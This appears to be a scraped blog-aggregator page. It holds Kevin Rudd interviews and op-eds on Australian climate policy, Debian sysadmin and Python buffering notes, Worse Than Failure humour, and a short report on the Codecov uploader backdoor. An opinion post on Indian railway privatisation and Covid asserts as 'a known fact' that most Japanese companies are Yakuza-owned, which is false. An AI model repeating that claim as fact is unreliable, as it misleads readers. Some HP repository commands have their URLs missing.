OK well we look at the international community. American officials are reportedly dissatisfied with Australia’s approach. The Biden administration has said it will try to pressure other countries to do more. I mean, how much of an impact do you think that could have on the Morrison government?

Kevin Rudd
Well so far, if Morrison was to work out that the United States as our principal ally, who we need in multiple areas of our international policy interest, is making this demand clear of the Australian Government, he really does need to begin to adjust now – in fact, if not yesterday. But if that persuasion doesn’t work, there’s something else rolling down the railway tracks towards Australia, which is so-called border adjustment tariffs, now being actively debated, deliberated on and decided both in Brussels and considered also in Washington to effectively impose a tax on those countries which refuse to take their share of the global burden in bringing down carbon emissions. So if it’s not going to be, as it were, inducement from the US through our alliance relationship with Washington, then there is the threat of punitive financial action which would affect the entire Australian economy. But you know something? Australia as a responsible middle power in the world, and as the driest continent on Earth, for God’s sake, we should be acting as the global leaders here, not the global wooden-spooners.

Thomas Oriti
You wrote an opinion piece in The Guardian this week, Mr Rudd with another former prime minister, Malcolm Turnbull, and how Australia’s ambition on climate change is held back by what you’re saying is a toxic mix of right-wing politics, media, and vested interests. I want to pick up on that last bit. Who are these vested interests and what’s their role?

Kevin Rudd
Well this has become a matter of political raw red meat for the Liberal Party and the National Party to go and chant the coal mantra. That’s one element of it; it’s part of the internal dynamics of the Liberal and National parties. Secondly, I didn’t say the media, I said the Murdoch media, and the Murdoch media has run — and Malcolm Turnbull agrees with me — a vicious campaign against effective climate change action in this country for more than a decade now. And because of their power in the print media in this country, where they have 70% of the print ownership, they have shaped and influenced significantly the terms of our national debate. And the third element in all this, of course, is our own big hydrocarbon companies, led by companies like BHP, which have been dragging the chain on this for a very long time. Put those three together with the hydrocarbon lobby’s trade union, which is the Minerals Council of Australia, and this represents a very powerful, potent force in Australian politics, which I had to contend with as prime minister, and they ultimately prevailed against me; which Malcolm Turnbull had to work against when he was prime minister, and they prevailed against him. Frankly, what is being lost as a consequence of this is effective, clear Australian international leadership on something which matters for our environment and economy in the future.

Thomas Oriti
Just to pick up on something you said a moment ago about the Murdoch media, Mr Rudd: the former US Director of National Intelligence, James Clapper, has backed your call for a royal commission into Rupert Murdoch’s media empire here in Australia. What do you make of that support, and where are you at with your petition at the moment?

Kevin Rudd
Well, the result of our petition, which attracted more than half a million signatures within 28 days across Australia — because the system collapsed, we suspect hundreds of thousands of petitioners in addition to that — was that the Senate decided to commission its own investigation into the future of media diversity. It continues to take evidence from myself, Malcolm Turnbull and others, including the media proprietors, on what we do on the future of this extraordinary monopoly which the Murdoch media has in Australia. It is the highest concentration of print media ownership anywhere in the Western world. Now, when Jim Clapper intervenes as the former director of national intelligence in the United States, what Clapper is saying is that the impact of Murdoch there in America, where he is not a majority player but is an aggressive player through Fox News, is that, untrammelled, this Fox media beast has significantly derailed the potential for consensus in American politics, not just on climate change but across a whole range of pressing challenges facing the United States. So he’s sending a clarion-clear message that if we’re going to have Fox News exercise that sort of influence in Australia, through Sky News, which is now having a huge impact across social media platforms and YouTube, then our country prospectively becomes ungovernable, like the United States has become in large part in recent years.

Thomas Oriti
Kevin Rudd, thanks very much for joining us this morning.

Kevin Rudd
Good to be with you.

Thomas Oriti
Former Australian Prime Minister Kevin Rudd, who is the president of the Asia Society in New York.

The post ABC NewsRadio: Earth Day Summit appeared first on Kevin Rudd.

Worse Than FailureError'd: When Words Collide

Waiting for his wave to collapse, surfer Mike I. harmonizes "Nice try Power BI, but you're not doing quantum computing quite right." Or, does he?



Finn Antti, caught in a hella Catch-22, explains "Apparently I need to install Feedback Hub from Microsoft Store to tell Microsoft that I can't install Feedback Hub from Microsoft Store."



Our old friend Pascal shares "Coupon codes don't work very well when they are URL encoded."



Unnamed pydsigner has a strong meme game. "It's bad enough when your fairly popular meme creation site runs out of storage, but to be unable to serve your pictures as a result? The completely un-obfuscated stacktrace is just insult to injury."



But the submission from Brad W. wins this week's prize. Says he: "The vehicle emissions site (linked directly from the state site) isn't handling the increased traffic well, but their error handling is superb. An online code browser allowing for complete examination of the entire stack and surroundings."





Planet DebianDirk Eddelbuettel: drat 0.2.0: Now with ‘docs/’


A new release of drat arrived on CRAN today. This is the first release in a few months (with the last release in July of last year) and it (finally) makes the leap to supporting docs/ in the main branch as we are all so tired of the gh-pages branch. We also have new vignettes, refreshed existing vignettes, and new (and very shiny) documentation!

drat stands for drat R Archive Template, and helps with easy-to-create and easy-to-use repositories for R packages. Since its inception in early 2015 it has found reasonably widespread adoption among R users because repositories with marked releases are the better way to distribute code. See below for a few custom reference examples.

Because for once it really is as your mother told you: Friends don’t let friends install random git commit snapshots. Or as we may now add: stay away from semi-random universe snapshots too.

Properly rolled-up releases it is. Just how CRAN shows us: a model that has demonstrated for two-plus decades how to do this. And you can too: drat is easy to use, documented by (now) six vignettes and just works.

The NEWS file summarises the release as follows:

Changes in drat version 0.2.0 (2021-04-21)

  • A documentation website for the package was added at (Dirk)

  • The continuous integration was switched to using ‘r-ci’ (Dirk)

  • The docs/ directory of the main repository branch can now be used instead of gh-pages branch (Dirk in #112)

  • A new repository can now be used to fork an initial drat repository (Dirk)

  • A new vignette “Drat Step-by-Step” was added (Roman Hornung and Dirk in #117 fixing #115 and #113)

  • The test suite was refactored for docs/ use (Felix Ernst in #118)

  • The minimum R version is now ‘R (>= 3.6)’ (Dirk fixing #119)

  • The vignettes were switched to minidown (Dirk fixing #116)

  • A new test file was added to ensure ‘NEWS.Rd’ is always at the current release version.

Courtesy of my CRANberries, there is a comparison to the previous release. More detailed information is on the drat page.

If you like this or other open-source work I do, you can now sponsor me at GitHub.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

Kevin RuddAFR: Mining Super-Profits Levy

The University of Western Australia

21 APRIL 2021

Published in the Australian Financial Review on 22 April 2021

“As was the case during the last resources boom, and the one before that, the super-profits earned by a handful of resource majors in this country are a giant rip-off of the Australian people.

“Furthermore, the greed of these three is unbelievable: they haven’t even bothered to establish serious, large-scale charitable foundations to benefit the Australian people at the scale that other serious global firms do. And in Rio’s case, they dynamite indigenous heritage on the way through.

“I fully understand the financial investment needed for long term projects. But nowhere in their long term financial planning did any company forecast prices at this level. That’s why the Australian people, who actually own these resources and merely lease them to these companies, deserve a higher return.

“That’s why I believe these three majors should pay a super-profits levy into a national investment fund to underpin the future of Australian higher education and research, because this is the sector that will need to generate the next tranche of national wealth. We need Australian equity in the global technology revolution now underway, where we are in danger of owning none of the intellectual property and assets that will drive future global growth.”


The post AFR: Mining Super-Profits Levy appeared first on Kevin Rudd.

Planet DebianRussell Coker: HP ML350P Gen8

I’m playing with a HP Proliant ML350P Gen8 server (part num 646676-011). For HP servers “ML” means tower (see the ProLiant Wikipedia page for more details [1]). For HP servers the “generation” indicates how old the server is, Gen8 was announced in 2012 and Gen10 seems to be the current generation.

Debian Packages from HP

wget -O /usr/local/
echo "# HP RAID" >> /etc/apt/sources.list
echo "deb [signed-by=/usr/local/] buster/current non-free" >> /etc/apt/sources.list

The above commands will setup the APT repository for Debian/Buster. See the HP Downloads FAQ [2] for more information about their repositories.


This package contains the hponcfg program that configures ILO (the HP remote management system) from Linux. One noteworthy command is “hponcfg -r” to reset the ILO, something you should do before selling an old system.


This package contains the ssacli program to configure storage arrays, here are some examples of how to use it:

# list controllers and show slot numbers
ssacli controller all show
# list arrays on controller identified by slot and give array IDs
ssacli controller slot=0 array all show
# show details of one array
ssacli controller slot=0 array A show
# show all disks on one controller
ssacli controller slot=0 physicaldrive all show
# show config of a controller, this gives RAID level etc
ssacli controller slot=0 show config
# delete array B (you can immediately pull the disks from it)
ssacli controller slot=0 array B delete
# create an array type RAID0 with specified drives, do this with one drive per array for BTRFS/ZFS
ssacli controller slot=0 create type=arrayr0 drives=1I:1:1

When a disk is used in JBOD mode just under 33MB will be used at the end of the disk for the RAID metadata. If you have existing disks with a DOS partition table you can put it in a HP array as a JBOD and it will work with all data intact (GPT partition table is more complicated). When all disks are removed from the server the cooling fans run at high speed, this would be annoying if you wanted to have a diskless workstation or server using only external storage.


This package contains the ssaducli diagnostic utility for storage arrays. The SSD “wear gauge report” doesn’t work for the 2 SSDs I tested it on, maybe it only supports SAS SSDs not SATA SSDs. It doesn’t seem to do anything that I need.


This package contains both 32bit and 64bit versions of the MegaRAID utility and deletes whichever one doesn’t match the installation in the package postinst, so it fails debsums checks etc. The MegaRAID utility is for a different type of RAID controller to the “Smart Storage Array” (AKA SSA) that the other utilities work with. As an aside it seems that there are multiple types of MegaRAID controller, the management program from the storcli package doesn’t work on a Dell server with MegaRAID. They should have made separate 32bit and 64bit versions of this package.


Here is the HP page for downloading firmware updates (including security updates) [3]; you have to log in first and have a warranty. This is legal but poor service. Dell servers have comparable prices (on the second-hand market) and comparable features, but give free firmware updates to everyone. Dell's Debian packages for supporting utilities are of lower overall quality, but Dell offers a wider range of support, so generally Dell support seems better in every way. Dell and HP hardware seem of equal quality, so overall I think it's best to buy Dell.

Suggestions for HP

Finding which of the signing keys to use is unreasonably difficult. You should get some HP employees to sign the HP keys used for repositories with their personal keys and then go to LUG meetings and get their personal keys well connected to the web of trust. Then upload the HP keys to the public key repositories. You should also use the same keys for signing all versions of the repositories. Having different keys for the different versions of Debian wastes people’s time.

Please provide firmware for all users, even if they buy systems second hand. It is in your best interests to have systems used long-term and have them run securely. It is not in your best interests to have older HP servers perform badly.

Having all the fans run at maximum speed when power is turned on is a standard server feature. Some servers can throttle the fan when the BIOS is running, it would be nice if HP servers did that. Having ridiculously loud fans until just before GRUB starts is annoying.

Worse Than FailureCodeSOD: Saved Changes

When you look at bad code, there's a part of your body that reacts to it. You can just feel it, in your spleen. This is code you don't want to maintain. This is code you don't want to see in your code base.

Sometimes, you get that reaction to code, and then you think about the code, and say: "Well, it's not that bad," but your spleen still throbs, because you know if you had to maintain this code, it'd be constant, low-level pain. Maybe you ignore your spleen, because hey, a quick glance, it doesn't seem that bad.

But your spleen knows. A line that seems bad, but mostly harmless, can suddenly unfurl into something far, far nastier.

This example, from Rikki, demonstrates:

private async void AttemptContextChange(bool saveChanges = true)
{
    if (m_Context != null)
    {
        if (saveChanges && !SaveChanges())
        {
            // error was already displayed to the user, just stop
        }
        else
        {
            dataGrid.ItemSource = null;
            m_Context.Dispose();
        }
    }
}

if (saveChanges && !SaveChanges()) is one of those lines that crawls into your spleen and just sits there. My brain tried to say, "oh, this is fine, SaveChanges() probably is just a validation method, and that's why the UI is already up to date, it's just a bad name, it should be CanSaveChanges()" . But if that's true, where does it perform the actual save? Nowhere here. My brain didn't want to see it, but my spleen knew.

If you ignore your spleen and spend a second thinking, it more or less makes sense: saveChanges (the parameter) is a piece of information about this operation- the user would like to save their changes. SaveChanges() the method probably attempts to save the changes, and returns a boolean value if it succeeded.

But wait, returning boolean values isn't how we communicate errors in a language like C#. We can throw exceptions! SaveChanges() should throw an exception if it can't proceed.

Which, speaking of exceptions, we need to think a little bit about the comment: // error was already displayed to the user, just stop.

This comment contains a lot of information about the structure of this program. SaveChanges() attempts to do the save, it catches any exceptions, and then does the UI updates, completely within its own flow. That simple method call conceals a huge amount of spaghetti code.

Sometimes, code doesn't look terrible to your brain, but when you feel its badness in your spleen, listen to it. Spleen-oriented Programming is where you make sure none of the code you have to touch makes your spleen hurt.


Planet DebianShirish Agarwal: The Great Train Robbery

I had a Twitter fight a few days back with a gentleman, and this article is a result of that fight. Sadly, I do not know the name of the gentleman, as he goes by a pseudonym, and I have not taken permission from him to quote him either way. So I will just state the observations I was able to make from the conversations we had. As people who read this blog regularly would know, I am and have been against the railway privatization which is happening in India, and I will be sharing some case studies from other countries as to how it panned out for them.

UK Railways

How Privatization Fails : Railways

The above video is by a gentleman called Shaun, who basically shared that privatization, as far as the UK is concerned, is nothing but monopolies, and while there are complex reasons for that, the design of the railways is such that it will always be a monopoly structure. At the most you can have several monopolies, but that is all that can happen. The idea of competition just cannot happen. Even the idea that subsidies will be lower and/or trains will run on time is far from fact; both of these facts have been checked and found to be truthful. It is argued that the UK is small and perhaps doesn't have the right conditions. That is probably true, but still we deserve a glance at the UK railway map.

UK railway map with operators

The above map is copyrighted to Map Marketing, where you can see it today. As can be seen above, most companies had their own specified areas. Now if you look at the facts, you will see that UK fares have been higher; in fact, an oldish article from Metro (a UK publication) shares the same. The UK effectively nationalized its railways, as many large rail operators were running in the red; even Scotland is set to nationalise its services in March 2022. Remember, this is a country which hasn't seen inflation go above 5% in nearly a decade; the only outlier was 2011, when it did breach the 5% mark. So from this, 'private gains, public losses' perhaps seems a fitting description. But then maybe we didn't use the right example. Perhaps Japan would be better: they have bullet trains while the UK is still thinking about them (HS2).

Japanese Railway

Below is the map of Japanese Railway

Railway map of Japan with ‘private ownership’ – courtesy Wikimedia commons

Japan started privatizing its railways in 1987 and to date they have not been fully privatized. On top of that, as much as ¥24 trillion of the long-term JNR debt was shouldered by the government at the expense of Japan's taxpayers, while almost a quarter of the workforce was cut. To add to it, while some parts of the Japanese railways did make profits, many of them did so through large-scale non-railway business, mostly real estate on land adjacent to railway stations; in many cases it seems this went all the way up to 60% of revenue. The most profitable has been the Shinkansen, though. And while it has been profitable, it has not been without safety scandals over the years, the biggest in recent years being the 2005 Amagasaki derailment. What was interesting to me was the aftermath: while the Wikipedia page doesn't share much, I had read at the time how a lot of ordinary people stood up to the companies, in a country where it is a known fact that most companies are owned by the Yakuza. And this is a country where people are loyal to their corporation or company no matter what. It is a strange culture to the West and also here in India, where people change jobs at the drop of a hat, although nowadays we have record unemployment. So perhaps Japan too does not meet our standard, as the operators do not compete with each other but are each a set monopoly in their regions. Also, how much subsidy there is or is not is not really transparent.

U.S. Railways

Last, but not least, I share the U.S. railway map. This was provided by a Mr. Tom Alison on Reddit, on the r/MapPorn channel. As the thread itself is archived and I do not know the gentleman concerned, nor have I taken permission for the map, I am sharing the compressed version –

U.S. Railway lines with the different owners

Now the U.S. railways are and have always been peculiar, as unlike the above two, the U.S. has always been more of a freight network. Probably much of it has to do with the fact that in the 1960s, when oil was cheap, the U.S. made zillions of roadways and romanticized the 'road trip', and has been doing so ever since. Also, the creation of low-cost airlines definitely didn't help the railways to have more passenger services; in fact, the opposite.

There are and have been smaller services and attempts at privatization in both New Zealand and Australia, and both have been failures; please see the papers in that regard. My simple point is this: as can be seen above, there have been various attempts at privatization of railways, and most of them have been a mixed bag. The only one which comes close to what we think of as good is the Japanese one, but that also used a lot of public debt, and we don't know what will happen next. Also, for higher-speed train services like a bullet train or whatever, you need direct routes, with no hairpin bends. In fact, a good talk on the topic is the TBD podcast which, while it talks about hyperloop, raises the same questions that would be asked if we were to do it in India. Another thing to keep in mind is that the Japanese have been exceptional builders, and this is because they have been forced to be: they live in a seismically active zone which made the Fukushima disaster a reality, but at the same time their buildings are earthquake-resistant.

Standard disclaimer – the above is a simplified version of things. I could have added in financial accounts, but that again has no set pattern; for e.g. some railways use accrual accounting, some use cash and some use hybrid. I could have also shared details of either the gauge or electrification, but all have slightly different standards, although unigauge is something that all railways aspire to, and electrification is again something that all railways want, although in many cases it just isn't economically feasible.

Indian Railways

Indian Railways itself made the move from cash to accrual accounting a couple of years back; in between, for a couple of years, it was hybrid. The sad part is that you can now never measure against past performance in the old way, because the system is so different. Hence, whether the Railways will be making a loss or a profit, we will come to know only much later. Also, most accountants don't know the new system well, so it is going to take more time, how much is unknown. Sadly, what the GOI did a few years back was merge the Railway budget into the Union budget. Of course, the excuse they gave was too many pressures of new trains, while the truth is that by doing this they decreased transparency about the whole thing. For e.g., for the last few years the only state which has had significant work done is U.P. (Uttar Pradesh), and a bit in Goa, although that has been protested time and again. I, being from the neighbouring state of Maharashtra, have been there several times. Now it all feels like a dream, going to Goa :(.

Covid news

Now before I jump to the news, I should share the movie 'Virus' (2019), which was made by the talented Aashiq Abu. Even though I am not a Malayalee, I have still enjoyed many of his movies, simply because he is a terrific director, and Malayalam movies, at least most of them, have English subtitles and a lot of original content. The first time I saw it, a couple of years back, I couldn't sleep a wink for a week. Even the next time, it was heavy. I had shared the movie with mum, and even she couldn't watch it in one go. It is and was that powerful. Now, maybe because we are headlong in the pandemic, the madness is all around us. There are two terms that helped me understand a great deal of what is happening in the movie. The first term was 'altered sensorium', which has been defined here. The other is saturation, or to be more precise 'oxygen saturation'. This term has also entered the Indian Twitter lexicon quite a bit, as India has started running out of oxygen. Just today the Delhi High Court held an emergency hearing on the subject late at night. Although there is much to share about the mismanagement of the centre, the best piece on the subject has been by Miss Priya Ramani. Yup, the same lady who won against M.J. Akbar, and this when Mr. Akbar had 100 lawyers for this specific case. It would be interesting to see what happens ahead.

There are however a few things even she forgot in her piece. For e.g., reverse migration, i.e. from urban to rural areas, started again; two articles from different entities share a similar outlook. Sadly, the right have no empathy or feeling for either the poor or the sick. Even the labour minister Santosh Gangwar's statement put the number at around 1.04 crore people who walked back home. While there is not much data, some work/research on migration suggests that the number could easily be 10 times as much. And this was in the lockdown of last year. This year, the same issue has re-surfaced, and migrants, having learned their lessons, started leaving cities. And I'm ashamed to say I think they are doing the right thing. Most state governments have not learned lessons, nor have they done any work to earn the trust of migrants. This is true of almost all state governments. Last year, just before the lockdown was announced, my friend and I spent almost 30k getting a cab all the way from Chennai to Pune, between what we paid for the cab and what we bribed the various people just so we could cross the state borders to return home to our anxious families. Thankfully, unlike the migrants, we were better off, although we did make a loss. I probably wouldn't be alive if I were in their situation, as many didn't survive. That number is still in the air: 'undocumented deaths' 😦

Vaccine issues

Currently, though, the issue has been the vaccines and the pricing of the same. A good article summarizing the issues has been shared in the Economist. Another article that goes to the heart of the issue is at Scroll. To buttress the argument, the SII chairman had shared this a few weeks back –

Adar Poonawala talking to Vishnu Som on Left, right center, 7th April 2021.

So, a licensee manufacturer wants to make super-profits during the pandemic. And now, as shared above, they can very easily do it. Even the quotes given to nearby countries are lower than the quotes given to Indian states –

Prices of AstraZeneca among various states and countries.

The situation around beds, vaccines, oxygen, anything is so dire that people will go to any lengths to save their loved ones, even if they know that a certain medicine doesn't work. For e.g. Remdesivir: WHO trials have concluded that it doesn't reduce mortality. Heck, even the AIIMS chief said the same. But the desperation of both doctors and relatives to cling on to hope has made Remdesivir a black market drug, with unofficial prices hovering anywhere between INR 14k/- and INR 30k/- per vial. One of the executives of a top firm was also arrested in Gujarat. In Maharashtra, an opposition M.P. came to the 'rescue' of the officials of Bruick pharms in Mumbai.

Sadly, this strange affection for the party in the centre is also there in my extended family. At one end they will heap praise on Mr. Modi; at the same time they can't wait to get out of India fast. Many of them have settled in, horror of horrors, Dubai, as it is the best place to do business and get international schools for the young ones at decent prices, cheaper or maybe a tad more than what they paid in Delhi or elsewhere. Being an Agarwal or a Gupta makes it easier to compartmentalize both things. Ease of doing business: 5 days flat to get a business registered, up and running. And the paranoia is still there. They won't talk on the phone about him because they are afraid they may say something which comes back to bite them. As far as their decision to migrate goes, I can't really blame them. If I were 20-25 years younger and my mum were in better shape than she is, we probably would have migrated as well, although I would have preferred Europe to anywhere else.

Internet Freedom and Aarogya Setu App.

Internet Freedom had shared the chilling effects of the Aarogya Setu app. This had also been shared by FSCI in the past, who recently had their handle banned on Twitter. It was also apparent in a bail order which a high court judge gave. While I won't go into the merits and demerits of the bail order, it is astounding for the judge to say that the accused, even while on bail, must install an app so he can be surveilled. And this is a high court judge; such a sad state of affairs. We seem to be setting new lows every day when it comes to judicial jurisprudence. One interesting aspect of the whole case was shared by Aishwarya Iyer. She shared a story that she and her team worked on at The Quint which raises questions on the quality of the work done by Delhi Police. It is of course up to Delhi Police to ascertain the truth of the matter, because unless and until they are able to tie in a leak from the PMO's office or POTUS's office, it hardly seems possible. For e.g., the dates when two heads of state can meet would be decided by the secretaries of the two. Once the date is known, it would be shared with the press, while at the same time some sort of security apparatus would kick into place. It is incumbent, especially on the host, to take as much care as he can of the guest. We all remember that World War 1 (the war to end all wars) started due to the murder of Archduke Ferdinand.

As nobody wants that, the best way is to make sure that a political murder doesn't happen on your watch. While I won't comment on what the arrangements would be, it is safe to assume there would be Z+ security along with higher readiness, especially for somebody as important as POTUS. Now, it would be quite a reach for Delhi Police to connect the two dates; they will either have to get creative with the dates or find some other way. Otherwise, with practically no knowledge in the public domain, they can't work in limbo. In either case, I do hope the case comes up for hearing soon and we see what Delhi Police says and contends in the High Court about the same. At the very least, it would be awkward for them to talk of the dates unless they can contend some mass conspiracy involving the PMO (which would bring into question the constant vetting done by the intelligence department of all those who work in the PMO). And this whole case seems a kind of shelter for the Delhi riots, in which mainly Muslims died, and whose deaths lie unaccounted for till date 😦


In conclusion, I would like to share a bit of humor, because right now the atmosphere is humorless, what with the authoritarian tendencies of the central government and the mass mismanagement of public health, which they have now left to the states to handle as they see fit. The piece I am sharing is from Arre, one of my go-to sites whenever I feel low.


Planet DebianEnrico Zini: Python output buffering

Here's a little toy program that displays a message like a split-flap display:


import sys
import time

def display(line: str):
    cur = '0' * len(line)
    while True:
        print(cur, end="\r")
        if cur == line:
            break
        # step every character one closer to its target, capped at the target
        cur = "".join(chr(min(ord(c) + 1, ord(oc))) for c, oc in zip(cur, line))
        time.sleep(0.05)

message = " ".join(sys.argv[1:])
display(message)
print()

This only works if the script's stdout is unbuffered. Pipe the output through cat, and you get a long wait, and then the final string, without the animation.

What is happening is that since the output is not going to a terminal, optimizations kick in that buffer the output and send it in bigger chunks, to make processing bulk I/O more efficient.

I haven't found a good introductory explanation of buffering in Python's documentation. The details seem to be scattered in the io module documentation and they mostly assume that one is already familiar with concepts like unbuffered, line-buffered or block-buffered. The libc documentation has a good quick introduction that one can read to get up to speed.
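The effect is easy to reproduce without a terminal: here is a small sketch that uses an in-memory io.BytesIO as a stand-in for a pipe, showing that a block-buffered text stream holds writes back until a flush.

```python
import io

# A block-buffered text layer over an in-memory binary stream:
raw = io.BytesIO()
out = io.TextIOWrapper(raw)

out.write("00000\r")
before = raw.getvalue()   # still empty: the bytes sit in the text buffer

out.flush()
after = raw.getvalue()    # flush() pushes the pending bytes through

print(before == b"")
print(after == b"00000\r")
```

The same thing happens to sys.stdout when it points at a pipe: the animation frames pile up in a buffer instead of reaching cat.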

Controlling buffering in Python

In Python, one can force a buffer flush with the flush() method of the output file descriptor, like sys.stdout.flush(), to make sure pending buffered output gets sent.

Python's print() function also supports flush=True as an optional argument:

    print(cur, end="\r", flush=True)

If one wants to change the default buffering for a file descriptor, since Python 3.7 there's a convenient reconfigure() method, which can reconfigure line buffering only:

    sys.stdout.reconfigure(line_buffering=True)
Otherwise, the technique is to reassign sys.stdout to something that has the behaviour one wants (code from this StackOverflow thread):

import io
import sys
# Python 3: reopen stdout as binary and unbuffered, then wrap it in a TextIOWrapper with write-through.
sys.stdout = io.TextIOWrapper(open(sys.stdout.fileno(), 'wb', 0), write_through=True)
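What write_through buys you can be checked in isolation; in this sketch an io.BytesIO stands in for the reopened stdout, and each write lands in the underlying stream immediately, with no flush needed.

```python
import io

raw = io.BytesIO()
out = io.TextIOWrapper(raw, write_through=True)

out.write("0\r")  # with write_through, bytes reach the raw stream at once
print(raw.getvalue() == b"0\r")
```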

If one needs all this to implement a progressbar, one should make sure to have a look at the progressbar module first.

Cryptogram On North Korea’s Cyberattack Capabilities

Excellent New Yorker article on North Korea’s offensive cyber capabilities.

Cryptogram Backdoor Found in Codecov Bash Uploader

Developers have discovered a backdoor in the Codecov bash uploader. It’s been there for four months. We don’t know who put it there.

“Codecov said the breach allowed the attackers to export information stored in its users’ continuous integration (CI) environments. This information was then sent to a third-party server outside of Codecov’s infrastructure,” the company warned.

Codecov’s Bash Uploader is also used in several uploaders — Codecov-actions uploader for Github, the Codecov CircleCl Orb, and the Codecov Bitrise Step — and the company says these uploaders were also impacted by the breach.

According to Codecov, the altered version of the Bash Uploader script could potentially affect:

  • Any credentials, tokens, or keys that our customers were passing through their CI runner that would be accessible when the Bash Uploader script was executed.
  • Any services, datastores, and application code that could be accessed with these credentials, tokens, or keys.
  • The git remote information (URL of the origin repository) of repositories using the Bash Uploaders to upload coverage to Codecov in CI.

Add this to the long list of recent supply-chain attacks.
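One common defence against this class of attack is to pin a checksum of the fetched script and refuse to run it if the digest has changed. A minimal sketch (the script bytes and the pinned digest here are hypothetical, not Codecov's):

```python
import hashlib

def verify_script(script: bytes, expected_sha256: str) -> bool:
    """Return True only if the fetched script matches the pinned digest."""
    return hashlib.sha256(script).hexdigest() == expected_sha256

# Hypothetical known-good uploader and its pinned digest:
good = b"#!/bin/bash\necho uploading coverage\n"
pinned = hashlib.sha256(good).hexdigest()

print(verify_script(good, pinned))                               # True
print(verify_script(good + b"\ncurl attacker.example", pinned))  # False: tampered
```

This would have caught the altered uploader the moment it diverged from the published version, at the cost of having to update the pinned digest on every legitimate release.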

Planet DebianSven Hoexter: bullseye: doveadm as unprivileged user with dovecot ssl config

The dovecot version which will be released with bullseye seems to require some subtle config adjustment if you

  • use ssl (ok that should be almost everyone)
  • and you would like to execute doveadm as a user who cannot read the ssl cert and keys (quite likely).

I guess one of the common cases is executing doveadm pw, e.g. if you use postfixadmin. For myself it manifested in the nginx error log, which I use in combination with php-fpm, as:

2021/04/19 20:22:59 [error] 307467#307467: *13 FastCGI sent in stderr: "PHP message:
Failed to read password from /usr/bin/doveadm pw ... stderr: doveconf: Fatal: 
Error in configuration file /etc/dovecot/conf.d/10-ssl.conf line 12: ssl_cert:
Can't open file /etc/dovecot/private/dovecot.pem: Permission denied

You easily see the same error message if you just execute something like doveadm pw -p test123. The workaround is to move your ssl configuration to a new file which is only readable by root, and create a dummy one which disables ssl, and has a !include_try on the real one. Maybe best explained by showing the modification:

cd /etc/dovecot/conf.d
cp 10-ssl.conf 10-ssl_server
chmod 600 10-ssl_server
echo 'ssl = no' > 10-ssl.conf
echo '!include_try 10-ssl_server' >> 10-ssl.conf

Discussed upstream here.

Kevin RuddThe Guardian: Kevin Rudd and Malcolm Turnbull – Australia’s ambition on climate change is held back by a toxic mix of rightwing politics, media and vested interests

By Kevin Rudd and Malcolm Turnbull

It was always expected that Joe Biden’s election would be a massive shot in the arm for international climate action, but the scale of that boost has been genuinely surprising.

The new president has now invited 40 world leaders to a virtual climate change summit coinciding with Earth Day this Thursday. China’s Xi Jinping will be there, following productive face-to-face talks last week between Biden’s climate envoy, John Kerry, and his Chinese counterpart, Xie Zhenhua, in Shanghai. Even Vladimir Putin is attending, despite divisions between Washington and the Russian leader over new sanctions.

Japan, South Korea and Canada are all expected to announce new medium-term 2030 emissions reduction plans this week, after earlier refusing to do so. Even China – the world’s largest emitter – last week signalled they may also be prepared to do more this decade above and beyond commitments they made at the end of last year.

Our country, however, continues to bury its head in the sand, despite the fact that Australia remains dangerously at risk of the economic and environmental consequences that will come from the climate crisis barrelling towards us.

Prime minister Scott Morrison’s refusal to adopt both a firm timeline to reach net zero emissions and to increase its own interim 2030 target leaves us effectively isolated in the western world. It also goes against what we signed up to through the Paris agreement – which both our governments worked so hard to secure.

According to our independent Climate Change Authority (CCA) and the Australian Energy Market Operator (Aemo), not only should Australia be doing much more as “our fair share” towards global efforts to reduce emissions, but importantly we also now have the capacity to do more.

The reality is Australia’s current target, set in 2015, to reduce emissions by 26 to 28% on 2005 levels by 2030 is now woefully inadequate – and was always intended to be updated this year. The Obama administration had exactly the same target as Australia, but aimed to achieve it five years earlier than us, which in reality made it much more ambitious than ours. And this week, the Biden administration is expected to announce a new 2030 pledge twice as deep as Australia’s current effort. This will set a new global litmus test for Australia’s own ambition, which as the CCA has said should be at least a 45% cut by 2030.

But, as two former prime ministers representing our nation’s centre-left and centre-right parties, the world shouldn’t give up hope on our country just yet. Thankfully, there is some cause for optimism. Our sun-drenched country has the highest per capita penetration of rooftop solar in the world. And with the right approach, Aemo has said that renewables could go from providing a quarter of electricity market demand on our populous eastern seaboard today to 75% in less than five years. The fact we are in a position to even be able to seize this technological opportunity is in large part due to the introduction in 2009 of a 20% clean renewable energy target for 2020 and the launching of the largest renewable clean energy project in our nation’s history (Snowy Hydro 2.0) by our respective governments.

The national consensus for climate action in Australia has also shifted markedly in recent years. Every state and territory government is now committed to net zero emissions, so too are our peak industry, business and agriculture groups, as well as our national airline, and even our largest mining company.

The main thing holding back Australia’s climate ambition is politics: a toxic coalition of the Murdoch press, the right wing of the Liberal and National parties, and vested interests in the fossil fuel sector.

Sadly, instead of seizing this technological opportunity and embracing this newfound national consensus, the government remains hell-bent on a “gas-fired recovery” from Covid-19. Old coal plants still generate around 75% of Australia’s electricity. But these are being replaced by renewables plus storage because they are a cheaper form of generation than the alternatives on offer.

Gas has a role to play in the transition, but that role is to steadily diminish as renewables continue to grow. To bet big on the future role of gas is to bet against the best engineering and economic advice coming out of Aemo, and to ignore the scientific advice that more gas in the grid will simply lead to more emissions. The only long-term gas-fired future we should be planning is green hydrogen made by electrolysing water with renewable energy.

Australia may be able to get away with showing up empty-handed to this week’s summit, but will find it even more difficult to do as a special guest of the British at the G7 leaders’ summit in June. We would be the only developed country in the room that is not committed to net zero by 2050. And we will find it even harder again to show up empty-handed at the COP26 Climate Conference in Glasgow at the end of the year, given more than 100 countries in the world have pledged to increase their ambition.

There are also consequences for this inaction.

As the rolling apocalypse of fires and floods in our country demonstrates, Australia is on the global frontline of this climate crisis. Last year’s wildfires claimed dozens of lives, destroyed thousands of homes, wiped out billions of animals, and cost billions of dollars.

With more than 70% of Australia’s trade now with countries committed to net zero, the prospect of carbon border taxes being introduced – beginning with the European Union – also leaves us economically exposed. So too does our continued faith in coal as a leading export commodity, especially with many of the 50 proposed new coalmines in Australia already struggling to attract finance. Instead of expanding coal, we should be increasing our support for ground-breaking projects such as the Asian Renewable Energy Hub in the Pilbara region which could allow us to become a green hydrogen supplier for Asia’s clean energy transition. There are also promising new hydrogen projects planned for Queensland centred on Gladstone, a traditional coal port. Building dozens of new coalmines won’t set Australia up for the future; it will lock us into the past.

